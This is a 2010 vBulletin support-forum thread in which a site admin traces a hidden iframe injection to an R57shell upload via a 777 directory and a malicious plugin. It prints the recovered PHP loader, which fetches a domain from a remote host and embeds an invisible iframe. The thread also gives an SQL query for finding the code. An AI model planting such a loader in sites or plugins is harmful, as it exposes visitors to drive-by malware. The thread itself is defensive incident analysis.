Code inserted in to my templates.

**DaveS** · Thu 25 Feb '10, 4:33am

Hi.
Right I now know that $lol was placed in the footer template for a couple of styles that were live.
I assume that $lol then inserts the IFRAME code. However I can't find anything that mentions of $lol inthe variables or how it could have been done.
So although I've now removed $lol from the templates I need to find out where that is and also to find out where it's happened.
I could be that one of the Administrators has had their accounts hacked, I can't see anything in the control panel logs.
The site was hammered this morning for about 2 hours so I guess that could have been a dictionary attack trying to crack an Admins password?
Any help appreciated!
Cheers
Dave

**Lynne** · Thu 25 Feb '10, 7:49am

Did you look through your access_logs? Look in your plugins? Run maintenance > diagnostics > suspect file versions and see if there is some strange file listed there.

**DaveS** · Thu 25 Feb '10, 7:55am

Hi Lynne. Thank you for your reply.
I have been looking over the various logs all day so far to see how this happened.

Suspect file version - yes done the check. Nothing found.
Access logs - Yes nothing in there.
Looked in plugins - Nothing strange there.

So I know that the template has been edited as taking out the added text has removed the malicious iframe code.

I can't find the reference to $lol anywhere in vB and it must be in there somewhere.

I think I may have been subject to an exploit as I'm not on the very latest version of 3.8. I will do that in a mo. I was going to go straight to vB4 but I'm not ready for 4 yet.

**Lynne** · Thu 25 Feb '10, 8:21am

Sorry, I'm not an expert on this sort of thing. Perhaps someone else can come along with more specifics on what to look for.

**DaveS** · Thu 25 Feb '10, 8:26am

No. Thank you Lynne any help is appreciated.
We've just found the source. My own stupid fault.
A very old directory with 777 permissions that was used to store pics in.
An R57shell script has been uploaded and then it looks like used to break the MySQL password. Which was the outage earlier this morning I assume.
So any hacking was done via MySQL with the template presumably edited from there.

**DaveS** · Thu 25 Feb '10, 12:04pm

I've found some more.... information.
I've been searching the MySQL tables and have found the following in the vb_datastore table.
However I'm not exactly sure what is in the datastore tables.
I can see that there appear to be plugin's.
Can anyone help me?

$domain = file_get_contents('http://kornoval.com:21/domain/tb.txt');
$id = '766';
$hash = 'a25144ea1f7195206c5f614241cd4844';
$lol = "<iframe name=\"fra\" width=\"1\" height=\"1\" scrolling=\"no\" frameborder=\"no\" marginwidth=\"0\" marginheight=\"0\" src=\"http://$domain/x/?id=$id&hash=$hash\"></iframe>";

**DaveS** · Thu 25 Feb '10, 12:22pm

And found the plugin finally. The malicious code was in a plugin entitled......

AME : Permission Hide

**wtrk** · Thu 25 Feb '10, 1:02pm

im having the same problem. i had the ame product installed and have now removed it. i cant find any $lol in the templates but google webmaster tools shows me a bunch of threads that are infected so im deleting them now one by one to see if that fixes the problem.

**DaveS** · Thu 25 Feb '10, 1:23pm

I don't think its specifically the AME product. Any of them could have been chosen in my case to hide the infection.
I found running some SQL queries against the template or plugins table quite useful.
So like this....

Code:

SELECT * FROM vb_plugin WHERE phpcode LIKE "%$lol%";

**wtrk** · Thu 25 Feb '10, 1:56pm

where you able to remove the malicious code completely?

google is still calling my site malicious, i submitted a thing though the webmaster tools to have it reviewed, does anybody know how long it takes?

**DaveS** · Fri 26 Feb '10, 12:48am

Originally posted by wtrk

where you able to remove the malicious code completely?

google is still calling my site malicious, i submitted a thing though the webmaster tools to have it reviewed, does anybody know how long it takes?

Yes I was able to remove it all completely but it was hard work to identify.
My site was I think only compromised for a few hours so I'm sure that helped with Google not picking anything up. Checking the Webmaster tools now it says that it hasn't found any malware.
However because my server has been compromised and I can't be sure what else has been done I'm considering a full rebuild.. just to be sure.
There's a definite lesson here in a being careful in use of 777 CHMOD'd directories! I had the attitude that it wouldn't really happen to me as my site is relatively small with 6000 uniques per day.
So I've learnt a lesson the hard way.

vBulletin 3 End of Life

Code inserted in to my templates.

Code inserted in to my templates.

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment